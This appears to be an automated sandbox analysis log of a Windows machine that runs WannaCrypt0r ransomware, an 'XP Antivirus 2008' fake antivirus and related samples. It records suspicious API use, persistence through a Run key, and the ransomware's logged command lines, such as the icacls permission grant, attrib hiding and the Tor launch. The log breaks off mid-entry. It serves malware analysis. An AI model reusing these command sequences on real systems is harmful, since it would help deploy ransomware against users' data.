rhc3stj0e147.exe -
Suspicious use of SetWindowsHookEx 64 IoCs
pid Process 4908 firefox.exe 4908 firefox.exe 4908 firefox.exe 4908 firefox.exe 412 D.exe 4908 firefox.exe 4908 firefox.exe 4908 firefox.exe 4908 firefox.exe 4908 firefox.exe 4908 firefox.exe 4908 firefox.exe 4908 firefox.exe 4908 firefox.exe 4908 firefox.exe 4908 firefox.exe 4908 firefox.exe 4908 firefox.exe 4908 firefox.exe 4908 firefox.exe 5176 rhc3stj0e147.exe 5176 rhc3stj0e147.exe 5176 rhc3stj0e147.exe 5176 rhc3stj0e147.exe 4908 firefox.exe 4908 firefox.exe 4908 firefox.exe 4908 firefox.exe 4908 firefox.exe 4908 firefox.exe 6052 iexplore.exe 6052 iexplore.exe 5304 IEXPLORE.EXE 5304 IEXPLORE.EXE 4908 firefox.exe 4908 firefox.exe 4908 firefox.exe 4980 @[email protected] 4980 @[email protected] 4420 @[email protected] 4420 @[email protected] 2068 @[email protected] 2068 @[email protected] 6208 @[email protected] 6052 iexplore.exe 6052 iexplore.exe 6932 IEXPLORE.EXE 6932 IEXPLORE.EXE 1928 @[email protected] 6052 iexplore.exe 6052 iexplore.exe 2008 IEXPLORE.EXE 2008 IEXPLORE.EXE 2008 IEXPLORE.EXE 2008 IEXPLORE.EXE 4908 firefox.exe 4908 firefox.exe 4908 firefox.exe 6388 @[email protected] 4908 firefox.exe 4908 firefox.exe 4908 firefox.exe 4076 @[email protected] 5304 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3480 wrote to memory of 4908 3480 firefox.exe 84 PID 3480 wrote to memory of 4908 3480 firefox.exe 84 PID 3480 wrote to memory of 4908 3480 firefox.exe 84 PID 3480 wrote to memory of 4908 3480 firefox.exe 84 PID 3480 wrote to memory of 4908 3480 firefox.exe 84 PID 3480 wrote to memory of 4908 3480 firefox.exe 84 PID 3480 wrote to memory of 4908 3480 firefox.exe 84 PID 3480 wrote to memory of 4908 3480 firefox.exe 84 PID 3480 wrote to memory of 4908 3480 firefox.exe 84 PID 3480 wrote to memory of 4908 3480 firefox.exe 84 PID 3480 wrote to memory of 4908 3480 firefox.exe 84 PID 4908 wrote to memory of 4216 4908 firefox.exe 85 PID 4908 wrote to memory of 4216 4908 firefox.exe 85 PID 4908 wrote to memory of 4216 4908 firefox.exe 85 PID 4908 wrote to memory of 4216 4908 firefox.exe 85 PID 4908 wrote to memory of 4216 4908 firefox.exe 85 PID 4908 wrote to memory of 4216 4908 firefox.exe 85 PID 4908 wrote to memory of 4216 4908 firefox.exe 85 PID 4908 wrote to memory of 4216 4908 firefox.exe 85 PID 4908 wrote to memory of 4216 4908 firefox.exe 85 PID 4908 wrote to memory of 4216 4908 firefox.exe 85 PID 4908 wrote to memory of 4216 4908 firefox.exe 85 PID 4908 wrote to memory of 4216 4908 firefox.exe 85 PID 4908 wrote to memory of 4216 4908 firefox.exe 85 PID 4908 wrote to memory of 4216 4908 firefox.exe 85 PID 4908 wrote to memory of 4216 4908 firefox.exe 85 PID 4908 wrote to memory of 4216 4908 firefox.exe 85 PID 4908 wrote to memory of 4216 4908 firefox.exe 85 PID 4908 wrote to memory of 4216 4908 firefox.exe 85 PID 4908 wrote to memory of 4216 4908 firefox.exe 85 PID 4908 wrote to memory of 4216 4908 firefox.exe 85 PID 4908 wrote to memory of 4216 4908 firefox.exe 85 PID 4908 wrote to memory of 4216 4908 firefox.exe 85 PID 4908 wrote to memory of 4216 4908 firefox.exe 85 PID 4908 wrote to memory of 4216 4908 firefox.exe 85 PID 4908 wrote to memory of 4216 4908 firefox.exe 85 PID 4908 wrote to memory of 4216 4908 firefox.exe 85 PID 4908 wrote to memory of 4216 4908 firefox.exe 85 PID 4908 wrote to memory of 4216 4908 firefox.exe 85 PID 4908 wrote to memory of 4216 4908 firefox.exe 85 PID 4908 wrote to memory of 4216 4908 firefox.exe 85 PID 4908 wrote to memory of 4216 4908 firefox.exe 85 PID 4908 wrote to memory of 4216 4908 firefox.exe 85 PID 4908 wrote to memory of 4216 4908 firefox.exe 85 PID 4908 wrote to memory of 4216 4908 firefox.exe 85 PID 4908 wrote to memory of 4216 4908 firefox.exe 85 PID 4908 wrote to memory of 4216 4908 firefox.exe 85 PID 4908 wrote to memory of 4216 4908 firefox.exe 85 PID 4908 wrote to memory of 4216 4908 firefox.exe 85 PID 4908 wrote to memory of 4216 4908 firefox.exe 85 PID 4908 wrote to memory of 4216 4908 firefox.exe 85 PID 4908 wrote to memory of 4216 4908 firefox.exe 85 PID 4908 wrote to memory of 4216 4908 firefox.exe 85 PID 4908 wrote to memory of 4216 4908 firefox.exe 85 PID 4908 wrote to memory of 4216 4908 firefox.exe 85 PID 4908 wrote to memory of 4216 4908 firefox.exe 85 PID 4908 wrote to memory of 2308 4908 firefox.exe 86 PID 4908 wrote to memory of 2308 4908 firefox.exe 86 PID 4908 wrote to memory of 2308 4908 firefox.exe 86 PID 4908 wrote to memory of 2308 4908 firefox.exe 86 PID 4908 wrote to memory of 2308 4908 firefox.exe 86 PID 4908 wrote to memory of 2308 4908 firefox.exe 86 PID 4908 wrote to memory of 2308 4908 firefox.exe 86 PID 4908 wrote to memory of 2308 4908 firefox.exe 86 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 5856 attrib.exe 4368 attrib.exe
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:668
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p1⤵PID:788
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding2⤵PID:3056
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}2⤵PID:3808
-
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca2⤵PID:3896
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding2⤵PID:3964
-
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca2⤵PID:4048
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding2⤵PID:3604
-
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding2⤵PID:3720
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}2⤵PID:1744
-
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca2⤵PID:1828
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding2⤵PID:1804
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding2⤵PID:2456
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding2⤵PID:4384
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}2⤵PID:5392
-
-
C:\Program Files (x86)\Internet Explorer\ielowutil.exe"C:\Program Files (x86)\Internet Explorer\ielowutil.exe" -CLSID:{0002DF01-0000-0000-C000-000000000046} -Embedding2⤵
- System Location Discovery: System Language Discovery
PID:5496
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding2⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:6052 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6052 CREDAT:17410 /prefetch:23⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:5304
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6052 CREDAT:17416 /prefetch:23⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:6932
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6052 CREDAT:17422 /prefetch:23⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2008
-
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}2⤵PID:5740
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding2⤵PID:6548
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding2⤵PID:6676
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding2⤵PID:7796
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding2⤵PID:1836
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding2⤵PID:7724
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding2⤵PID:7720
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding2⤵PID:7712
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding2⤵PID:6552
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding2⤵PID:6696
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding2⤵PID:7748
-
-
C:\Windows\system32\fontdrvhost.exe"fontdrvhost.exe"1⤵PID:796
-
C:\Windows\system32\fontdrvhost.exe"fontdrvhost.exe"1⤵PID:800
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS -p1⤵PID:908
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:968
-
C:\Windows\system32\dwm.exe"dwm.exe"1⤵PID:384
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:904
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p1⤵PID:1004
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1084
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1092
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1128
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:3028
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:1212
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1256
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1304
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1336
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1424
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2772
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1516
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1536
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1556
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1636
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1680
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1736
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1756
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1812
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1868
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1880
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1960
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:2000
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1668
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p1⤵PID:1772
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2096
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2160
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2316
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2396
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2400
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵PID:2636
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2696
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2708
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2724
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2736
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2840
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:772
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3412
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3516
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "https://drive.google.com/file/d/1ycPVXB8LX19SOkPPnUO6OX3YzrxzRENc/view?usp=sharing"2⤵
- Suspicious use of WriteProcessMemory
PID:3480 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url https://drive.google.com/file/d/1ycPVXB8LX19SOkPPnUO6OX3YzrxzRENc/view?usp=sharing3⤵
- Checks processor information in registry
- Modifies registry class
- NTFS ADS
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4908 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2028 -parentBuildID 20240401114208 -prefsHandle 1956 -prefMapHandle 1948 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b9731122-8c20-49d7-bb3c-a047bde2d88a} 4908 "\\.\pipe\gecko-crash-server-pipe.4908" gpu4⤵PID:4216
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2464 -parentBuildID 20240401114208 -prefsHandle 2456 -prefMapHandle 2452 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {39e7a940-d4cf-4de5-8c7e-5c61a8c8f933} 4908 "\\.\pipe\gecko-crash-server-pipe.4908" socket4⤵PID:2308
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3056 -childID 1 -isForBrowser -prefsHandle 3096 -prefMapHandle 3156 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 1004 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {87cb8915-2005-477e-b628-845407b300cd} 4908 "\\.\pipe\gecko-crash-server-pipe.4908" tab4⤵PID:3188
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3684 -childID 2 -isForBrowser -prefsHandle 3676 -prefMapHandle 3672 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1004 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4ff2226f-9fd6-4127-8a23-d8a20a6203da} 4908 "\\.\pipe\gecko-crash-server-pipe.4908" tab4⤵PID:2616
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4624 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4644 -prefMapHandle 4640 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {088802e4-65d5-4bb4-b3e6-e1c2deb1d56c} 4908 "\\.\pipe\gecko-crash-server-pipe.4908" utility4⤵
- Checks processor information in registry
PID:3488
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5076 -childID 3 -isForBrowser -prefsHandle 5040 -prefMapHandle 5060 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 1004 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fc83acf1-d66d-4d26-8212-bc626649c4c4} 4908 "\\.\pipe\gecko-crash-server-pipe.4908" tab4⤵PID:4568
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5212 -childID 4 -isForBrowser -prefsHandle 5220 -prefMapHandle 5224 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 1004 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {feddeca7-7b92-42fa-8315-97b17b029ab6} 4908 "\\.\pipe\gecko-crash-server-pipe.4908" tab4⤵PID:2152
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5408 -childID 5 -isForBrowser -prefsHandle 5488 -prefMapHandle 5416 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 1004 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0482960a-b9b9-4f0e-836f-a139dc47e70d} 4908 "\\.\pipe\gecko-crash-server-pipe.4908" tab4⤵PID:2216
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6052 -childID 6 -isForBrowser -prefsHandle 6152 -prefMapHandle 6172 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1004 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e766bd03-9b22-4210-8ab1-db6fab2b1c4a} 4908 "\\.\pipe\gecko-crash-server-pipe.4908" tab4⤵PID:4948
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2712 -childID 7 -isForBrowser -prefsHandle 3040 -prefMapHandle 1180 -prefsLen 30493 -prefMapSize 244658 -jsInitHandle 1004 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ac3bcd67-30d3-4a60-bba3-5bb6681c0b1f} 4908 "\\.\pipe\gecko-crash-server-pipe.4908" tab4⤵PID:5328
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3612 -parentBuildID 20240401114208 -prefsHandle 5160 -prefMapHandle 5176 -prefsLen 30572 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9623a3ac-41ac-4eb0-a22d-66c31d6eb550} 4908 "\\.\pipe\gecko-crash-server-pipe.4908" rdd4⤵PID:5728
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3168 -parentBuildID 20240401114208 -sandboxingKind 1 -prefsHandle 5100 -prefMapHandle 5148 -prefsLen 30572 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b63c7965-0438-4dde-9c81-3e493da452a8} 4908 "\\.\pipe\gecko-crash-server-pipe.4908" utility4⤵
- Checks processor information in registry
PID:2988
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6876 -childID 8 -isForBrowser -prefsHandle 6800 -prefMapHandle 6756 -prefsLen 28038 -prefMapSize 244658 -jsInitHandle 1004 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7c6a2d35-ab2b-47a9-913a-8c9de9df7af7} 4908 "\\.\pipe\gecko-crash-server-pipe.4908" tab4⤵PID:5084
-
-
-
-
C:\Users\Admin\Downloads\=D\D.exe"C:\Users\Admin\Downloads\=D\D.exe"2⤵
- Suspicious use of SetWindowsHookEx
PID:412
-
-
C:\Users\Admin\Downloads\XFC\[email protected]"C:\Users\Admin\Downloads\XFC\[email protected]"2⤵
- System Location Discovery: System Language Discovery
PID:5312 -
C:\Users\Admin\AppData\Local\Temp\is-SU69V.tmp\is-5VN37.tmp"C:\Users\Admin\AppData\Local\Temp\is-SU69V.tmp\is-5VN37.tmp" /SL4 $204EC "C:\Users\Admin\Downloads\XFC\[email protected]" 232353 522243⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5208 -
C:\Program Files (x86)\FileFix Professional 2009\wizard.exe"C:\Program Files (x86)\FileFix Professional 2009\wizard.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
PID:5896
-
-
-
-
C:\Users\Admin\Downloads\XFC\[email protected]"C:\Users\Admin\Downloads\XFC\[email protected]"2⤵
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1140
-
-
C:\Users\Admin\Downloads\XFC\[email protected]"C:\Users\Admin\Downloads\XFC\[email protected]"2⤵
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:5996
-
-
C:\Users\Admin\Downloads\XFC\[email protected]"C:\Users\Admin\Downloads\XFC\[email protected]"2⤵
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:5868
-
-
C:\Users\Admin\Downloads\XP Antivirus 2008\[email protected]"C:\Users\Admin\Downloads\XP Antivirus 2008\[email protected]"2⤵
- Loads dropped DLL
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:2588 -
C:\Windows\SysWOW64\wscript.exewscript //B C:\Users\Admin\AppData\Local\Temp\pin.vbs "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Antivirus XP 2008" "Antivirus XP 2008.lnk"3⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:1400
-
-
C:\Windows\SysWOW64\wscript.exewscript //B C:\Users\Admin\AppData\Local\Temp\pin.vbs "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Antivirus XP 2008" "Register Antivirus XP 2008.lnk"3⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:5516
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c egbh.bat "C:\Users\Admin\Downloads\XP Antivirus 2008\[email protected]"3⤵
- System Location Discovery: System Language Discovery
PID:3188
-
-
C:\Program Files (x86)\rhc3stj0e147\rhc3stj0e147.exe"C:\Program Files (x86)\rhc3stj0e147\rhc3stj0e147.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:5176 -
C:\Windows\SysWOW64\pphc7stj0e147.exe"C:\Windows\system32\pphc7stj0e147.exe"4⤵
- Executes dropped EXE
PID:6044
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r(1).zip\[email protected]"C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r(1).zip\[email protected]"2⤵
- Drops startup file
- Sets desktop wallpaper using registry
- System Location Discovery: System Language Discovery
PID:3544 -
C:\Windows\SysWOW64\attrib.exeattrib +h .3⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:5856
-
-
C:\Windows\SysWOW64\icacls.exeicacls . /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:3372
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r(1).zip\taskdl.exetaskdl.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5740
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 261951723652558.bat3⤵
- System Location Discovery: System Language Discovery
PID:6000 -
C:\Windows\SysWOW64\cscript.execscript.exe //nologo m.vbs4⤵
- System Location Discovery: System Language Discovery
PID:5756
-
-
-
C:\Windows\SysWOW64\attrib.exeattrib +h +s F:\$RECYCLE3⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:4368
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r(1).zip\@[email protected]3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4980 -
C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r(1).zip\TaskData\Tor\taskhsvc.exeTaskData\Tor\taskhsvc.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5516
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /b @[email protected] vs3⤵
- System Location Discovery: System Language Discovery
PID:5856 -
C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r(1).zip\@[email protected]4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
